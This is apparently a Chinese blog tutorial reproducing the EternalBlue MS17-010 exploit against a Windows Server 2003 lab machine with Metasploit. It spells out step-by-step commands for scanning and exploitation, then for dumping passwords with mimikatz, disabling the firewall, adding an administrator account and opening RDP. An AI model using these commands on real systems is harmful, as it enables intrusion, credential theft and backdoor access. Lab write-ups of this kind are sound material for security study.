永恒之蓝——Windows server 2003 漏洞复现

最新推荐文章于 2024-01-31 17:04:31 发布
最新推荐文章于 2024-01-31 17:04:31 发布
阅读量1.7k 收藏 11
点赞数 1
文章标签: web 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Megumiwind/article/details/119171380
版权
本文详细介绍了如何在Kali Linux上使用Metasploit框架发现并利用Windows Server 2003的MS17_010 SMB漏洞,包括扫描、利用步骤,以及后续的靶机操控和安全测试,适合渗透测试初学者学习。
摘要由CSDN通过智能技术生成

复现漏洞

靶机:Windows server 2003 IP:192.168.64.129

攻击机:kali 2021

1.在kali中启动msf模块

在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。

 进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。

2.搜索ms17_010:search ms17_010

 3.使用命令:use auxiliary/scanner/smb/smb_ms17_010

 4.show options 输入options来获得帮助命令。

RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描。

 5.set rhosts 192.168.64.129 扫描靶机(windows 2003 )并输入run或者exploit攻击。

 出现上述的情况表明存在漏洞,即445端口开放。

漏洞利用

1.启动windows2003攻击模块

输入命令:use exploit/windows/smb/ms17_010_psexec

 2.输入run或者exploit开始攻击

 攻击成功后出现如上页面。接下来可以使用kali操控靶机。

kali操作靶机

1.获取屏幕截图

直接输入screenshot即可获得屏幕截图。

 2.获取密码

输入load mimikatz,然后再输入wdigest。即可获得

3.shell控制

  • 首先关闭靶机防火墙

        netsh firewall set opmode mode=disable

         查看防护墙状态:netsh firewall show state

  •  添加用户:net user hack 123 /add

         查看靶机用户:net user

  •  给已添加的用户做提权处理:net localgroup Administrators hack /add

         可以输入net user确认是否提升为管理员权限。

  • 查看端口靶机端口开放情况。netstat -ano

        如果3389端口没有开放,可以输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\         Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启。

        查看3389端口:netstat -aon | findstr "3389"

  • 远程操控靶机:在控制面板输入rdesktop ip即可,我的主机即输入rdesktop 192.168.64.129

Megumiwind
关注
Windows 2003 Server远程代码执行漏洞集合
谢公子的博客
01-14 6231
目录 MS08-067 CVE-2017-7269 MS08-067 发布日期:2008/10/22 针对端口:139、445 漏洞等级:高危 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导...
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
永恒之蓝——windows server 2003 漏洞
菜鸟-传奇
07-07 4462
永恒之蓝——windows server 2003 漏洞 作业参考 作业参考2 一、永恒之蓝简述: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构...
Windows2003系统漏洞提权复现
热门推荐
wangyuxiang946的博客
07-21 1万+
操作系统: Microsoft Windows Server 2003 Web服务器: IIS V6.0
windows server 2003 永恒之蓝(MS17-010)漏洞复现
weixin_53696027的博客
01-10 1388
windows server 2003复现永恒之蓝
ms17永恒之蓝漏洞复现全过程(kali-server2003)
AmyBaby00的博客
11-12 2584
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 永恒之蓝是利用Windows操作系统445端口存在的漏洞进行传播,并具有自我复制、主动传播的特性。 基于Windows网络共享协议进行攻击传播的蠕虫恶意代码 一、测试准备: 目标机:server 2003 攻击机:kali 利用Nmap扫描IP ,查看已开启端口 发现445端口...
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
sinat_27757177的博客
10-17 5197
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
MS17-010(永恒之蓝漏洞复现
haoaaao的博客
04-04 1411
0x00 前置知识 1、永恒之蓝漏洞简介
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好; 渗透和验证过程必要有截图和文字说明; 其余部分均可配文字简介叙述; 作业模板在此基础上可以自由发挥设计; 熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linux、DOS命令
MSF利用永恒之蓝渗透win2003
懂进攻知防守
06-14 1101
本章通过使用msf在内网环境下利用永恒之蓝漏洞模拟攻击win2003完整的渗透流程。
记一次某竞赛中的渗透测试(Windows Server 2003靶机漏洞
最新发布
m0_73734159的博客
01-31 2089
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
实战ms17_010_psexec远程控制漏洞入侵Windows server 2003
hih30250的博客
11-06 1130
本篇文章记录使用metasploit利用Windows的远程控制漏洞攻击获取shell权限的过程。
Windows Server 2003Windows XP x86 上的最新漏洞补丁
weixin_33708432的博客
06-24 364
最近发现了一个安全问题,未经身份验证的远程***者可能会利用该问题来 破坏您的系统,并获取系统的控制权。 Windows Server 2003Windows XP x86 上的 Microsoft .NET Framework 2.0 SP2 的安全更新程序 (KB2656369) 下载地址:http://down.51cto.com/dat...
恼人的Windows 2003的BUG。。。
活到老死,学到老死。
10-09 1136
Windows2003在网络方面存在两个BUG,当然——只是我认为的BUG,说不定不是BUG而是我应用的问题,留待以后确认并更正吧。一个是WinInet无法使用InternetSetOption设置代理验证信息,这个严格来说倒应该算是IE7的BUG,但是只是2003的IE7的BUG。。。 这样就只能用HttpAddRequestHeaders设置代理验证信息了,还得自己用Base64加密一下。
Win2003 Enterprise x64 Edition漏洞下载地址
corpse2010的专栏
06-04 2754
漏洞修复扫描结果 补丁号 补丁名称 时间 下载链接 KB370280 Adobe Flash Player for IE 安全更新 2015-05-12 http://fpdownload.adobe.com/get/flashplayer/pdc/17.0.0.188/install_flash_player_ax.exe KB927891 W
2003 漏洞_Windows CryptoAPI验证绕过漏洞
weixin_34649022的博客
12-13 228
漏洞说明】2020年1月15日,微软官方发布新年首次安全更新,其中Windows CryptoAPI验证绕过漏洞(CVE-2020-0601)受到比较广泛的关注,该漏洞属于数字证书验证欺骗绕过,主要由于Windows CryptoAPI(Crypt32.dll)验证椭圆曲线加密算法证书逻辑不严谨导致。该漏洞由美国国家安全局(NSA)研究人员发现并通过CVD报告给微软,目前暂未有在野利用...
win2003服务器漏洞要修复吗,微软紧急发布Windows远程桌面高危漏洞补丁 涉及XP 2003...
weixin_27717759的博客
08-11 774
微软应急响应中心近日披露了WindowsServer2003,WindowsServer2008R2及WindowsServer2008的操作系统版本上存在的一个高危安全风险(漏洞编号:CVE-2019-0708),攻击者可利用该漏洞进行类似Wannacry的蠕虫利用攻击,影响大量WindowsXP、Windows2003Windows2008、Windows7的电脑及服务器。当未经身份验证的攻...
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值